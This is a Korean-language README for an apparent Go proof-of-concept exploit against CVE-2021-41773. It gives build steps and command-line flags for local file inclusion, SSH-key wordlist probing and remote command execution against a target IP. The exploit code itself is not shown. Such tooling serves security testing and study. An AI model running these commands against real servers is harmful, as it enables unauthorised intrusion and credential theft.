
이 저장소에는 CVE-2021-41773에 대한 PoC(개념 증명)가 포함되어 있습니다. 해당 CVE에는 LFI 및 RCE 취약점이 포함되어 있습니다.
이 저장소에는 CVE-2021-41773에 대한 개념 증명(PoC)이 포함되어 있습니다. 이 CVE는 로컬 파일 포함(LFI) 및 원격 코드 실행(RCE) 취약점을 노출합니다.
Go 버전 1.23.0이 설치되어 있는지 확인하세요.
다음 명령으로 익스플로잇 바이너리를 빌드하세요:
go build -o exploit
대상 IP 지정: -i 플래그를 사용하여 대상 IP 주소를 지정하세요(포트 포함). 이는 필수입니다.
./exploit -i 10.0.0.1:8080
SSH 워드리스트 크기 지정: -l 플래그를 사용하여 SSH 워드리스트의 크기를 선택하세요.
옵션:
0: 작음(기본값)1: 중간2: 큼./exploit -i 10.0.0.1:8080 -l 1
HTTPS 활성화: -ssl 플래그를 사용하여 HTTPS를 활성화합니다(기본값은 HTTP). 이 플래그는 선택 사항입니다.
./exploit -i 10.0.0.1:8080 -ssl
사용자 지정 SSH 키 워드리스트 지정: -k 플래그를 사용하여 SSH 키용 사용자 지정 워드리스트를 제공하세요. 이 플래그는 선택 사항입니다.
./exploit -i 10.0.0.1:8080 -k /usr/share/wordlist/SecLists/Discovery/Web-Content/quickhits.txt
원격 코드 실행(RCE) 활성화: -rce 플래그를 사용하여 원격으로 명령을 실행하세요. 이 플래그는 선택 사항입니다.
./exploit -i 10.0.0.1:8080 -rce
저는 Golang으로 무언가를 작성하고 언어를 배우고 싶었습니다.
이것은 제가 Golang으로 작성한 첫 번째 완성된 프로그램입니다.